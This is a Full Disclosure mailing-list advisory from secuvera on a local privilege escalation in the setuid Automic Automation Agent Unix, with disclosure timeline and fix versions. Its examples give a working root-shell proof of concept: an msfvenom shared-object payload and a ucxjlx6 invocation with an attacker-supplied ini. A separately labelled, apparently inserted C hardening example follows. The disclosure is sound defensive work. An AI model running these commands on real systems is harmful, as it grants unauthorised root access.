Message-ID: <af1747d9092049d3a910d9d78c7f47cb@secuvera.de>
Date: Mon, 12 May 2025 11:44:37 +0000
From: Flo Schäfer via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix

secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix

Affected Products
   Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1

References
   secuvera-SA-2025-01
   CVE not assigned yet
   CWE-426: Untrusted Search Path
   CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Summary:
   An agent configured to run in privileged mode (the agent binary carries the setuid bit) can be used to escalate privileges: an unprivileged local user supplies their own ini file with the "authentication" option set to "PAM" and the "libName" option pointing at a shared object they control.
   Because the agent resolves "libName" from the caller-supplied ini file and loads it while still running with elevated privileges, the shared object is loaded in the elevated context and can be used to execute arbitrary code as root.

Effect:
   The vulnerability results in privilege escalation, caused by arbitrary code execution in the context of the vulnerable application.

Examples:
   1. Generate a shared object whose payload runs when the library is loaded, using msfvenom (the option is spelled PrependSetgid; the payload calls setuid(0)/setgid(0) before exec'ing /bin/sh)
   $ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetgid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

   2. Run the setuid agent executable ucxjlx6 and point it at an attacker-supplied ini file via process substitution; the [PAM] section's libName is the shared object from step 1
   $ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
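The pattern behind the PoC above, and one way to close it, as an added example that is not code from this advisory or from the Automic agent: a setuid-root program takes a library path ("libName") from an ini file the caller controls and hands it to dlopen() while privileged. The hardened variant refuses any path that is not a regular, root-owned, non-writable file sitting directly in a fixed allow-list of directories, and it parses the same ini text the PoC uses so the verdict on "/tmp/sh.so" can be checked. The directory list TRUSTED_DIRS, the function names and the constructed ini string are assumptions; the dlopen() call itself is left to the caller so the check stays self-contained.

```c
/* Added example (not from the advisory or the Automic product). Models the
 * CWE-426 pattern: a setuid-root helper reads "libName" from a caller-supplied
 * ini file and would dlopen() it. Only a path that passes verify_library_path()
 * may be handed to dlopen(). TRUSTED_DIRS and POC_INI are assumptions. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical allow-list: where a packaged PAM glue library may live. */
static const char *TRUSTED_DIRS[] = { "/usr/lib/", "/usr/lib64/", "/opt/automic/agent/lib/" };

/* Why a path was refused; LIB_OK means it is safe to hand to dlopen(). */
enum lib_verdict { LIB_OK = 0, LIB_BAD_PATH, LIB_UNTRUSTED_DIR, LIB_STAT_FAIL,
                   LIB_NOT_REGULAR, LIB_WRITABLE, LIB_NOT_ROOT_OWNED };

/* Constructed copy of the ini text from the PoC (not a real agent config). */
static const char *POC_INI =
    "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n"
    "[MISC]\nauthentication = PAM\n"
    "[PAM]\nlibName = /tmp/sh.so\n"
    "[VARIABLES]\nUC_EX_JOB_MD=blep\n";

/* Minimal ini scan for the "libName" key inside the "[PAM]" section. Returns 1 if found. */
int parse_pam_lib_name(const char *ini, char *out, size_t outsz) {
    int in_pam = 0;
    const char *line = ini;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        while (len && (*line == ' ' || *line == '\t')) { line++; len--; }
        if (len && *line == '[') {
            in_pam = (len >= 5 && strncmp(line, "[PAM]", 5) == 0);
        } else if (in_pam && len > 7 && strncmp(line, "libName", 7) == 0) {
            const char *v = memchr(line, '=', len);
            if (v) {
                v++;                                   /* skip '=' */
                size_t vlen = len - (size_t)(v - line);
                while (vlen && (*v == ' ' || *v == '\t')) { v++; vlen--; }
                while (vlen && (v[vlen - 1] == ' ' || v[vlen - 1] == '\t' || v[vlen - 1] == '\r')) vlen--;
                if (vlen >= outsz) vlen = outsz - 1;
                memcpy(out, v, vlen);
                out[vlen] = '\0';
                return 1;
            }
        }
        if (!eol) break;
        line = eol + 1;
    }
    return 0;
}

/* Hardened check against one trusted directory: absolute path without "." or ".."
 * segments, directly inside trusted_dir (no subdirectory), a regular file (lstat,
 * so a planted symlink is not followed), not group/world writable, owned by root. */
enum lib_verdict verify_trusted_file(const char *path, const char *trusted_dir) {
    size_t plen;
    if (!path || path[0] != '/' || strstr(path, "/../") || strstr(path, "/./") ||
        ((plen = strlen(path)) >= 3 && strcmp(path + plen - 3, "/..") == 0))
        return LIB_BAD_PATH;
    size_t n = strlen(trusted_dir);
    if (strncmp(path, trusted_dir, n) != 0 || path[n] == '\0' || strchr(path + n, '/'))
        return LIB_UNTRUSTED_DIR;
    struct stat st;
    if (lstat(path, &st) != 0) return LIB_STAT_FAIL;
    if (!S_ISREG(st.st_mode)) return LIB_NOT_REGULAR;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return LIB_WRITABLE;
    if (st.st_uid != 0) return LIB_NOT_ROOT_OWNED;
    return LIB_OK;
}

/* The vulnerable code passes the ini value to dlopen() unchecked; this instead
 * requires the path to sit directly in one of TRUSTED_DIRS and pass the file checks. */
enum lib_verdict verify_library_path(const char *path) {
    if (!path || path[0] != '/') return LIB_BAD_PATH;
    for (size_t i = 0; i < sizeof TRUSTED_DIRS / sizeof *TRUSTED_DIRS; i++)
        if (strncmp(path, TRUSTED_DIRS[i], strlen(TRUSTED_DIRS[i])) == 0)
            return verify_trusted_file(path, TRUSTED_DIRS[i]);
    return LIB_UNTRUSTED_DIR;
}

/* Verdict for the libName found in an ini file, as the hardened agent would compute it. */
enum lib_verdict verdict_for_ini(const char *ini) {
    char lib[256];
    if (!parse_pam_lib_name(ini, lib, sizeof lib)) return LIB_BAD_PATH;
    return verify_library_path(lib);
}

/* Self-check: a world-writable file is refused even inside a trusted directory. */
enum lib_verdict verdict_for_world_writable_tmpfile(void) {
    char tmpl[] = "/tmp/libcheck-XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) return LIB_STAT_FAIL;
    if (fchmod(fd, 0666) != 0) { close(fd); unlink(tmpl); return LIB_STAT_FAIL; }
    enum lib_verdict v = verify_trusted_file(tmpl, "/tmp/");   /* planted writable .so */
    close(fd);
    unlink(tmpl);
    return v;
}

int main(void) {
    char lib[256];
    parse_pam_lib_name(POC_INI, lib, sizeof lib);
    printf("PoC libName %s -> verdict %d (0 = OK)\n", lib, verify_library_path(lib));
    printf("world-writable file in trusted dir -> verdict %d\n", verdict_for_world_writable_tmpfile());
    return 0;
}
```

The ownership and mode checks matter as much as the directory allow-list: a root-owned directory that contains a group-writable file, or a symlink an unprivileged user could plant, would otherwise give the same result as the attacker-supplied "/tmp/sh.so". The more robust fix is not to accept the library path from a caller-controlled ini file at all while privileged, which is the direction the advisory's "untrusted search path" classification points to.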


Solution:
   Update to version 24.3.0 HF4 or 21.0.13 HF1, or a later release

Disclosure Timeline:
   2025/01/20 vulnerability discovered
   2025/01/21 vendor contacted
   2025/01/21 vendor acknowledged receipt
   2025/02/04 requested status update
   2025/02/04 provided clarification about the issue
   2025/02/11 requested status update
   2025/02/26 vendor confirmed vulnerability
   2025/03/06 requested status update
   2025/03/17 vendor provided fix and requested review
   2025/04/03 vendor retracted request for review
   2025/04/10 proposed date for public disclosure, vendor requested delay
   2025/04/16 coordinated on cvss score and recommended fix
   2025/04/28 requested status update
   2025/05/02 vendor supplied tentative date for public disclosure
   2025/05/08 requested status update
   2025/05/12 public disclosure

Credits:
Flora Schaefer
fschaefer@...uvera.de
secuvera GmbH
https://www.secuvera.de

Disclaimer:
    All information is provided without warranty. The intent is to
    provide information to secure infrastructure and/or systems, not
    to be able to attack or damage. Therefore secuvera shall
    not be liable for any direct or indirect damages that might be
    caused by using this information.

Kind regards

Flo Schäfer

My pronouns are she*he/her*him. I welcome a gender-neutral form of address.

+49 7032/9758-29
#Legal information
secuvera GmbH
Siedlerstraße 22-24
71126 Gäufelden/Stuttgart
www.secuvera.de

Register court: Amtsgericht Stuttgart HRB 241704
Managing directors: Tobias Glemser, Reto Lorenz



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
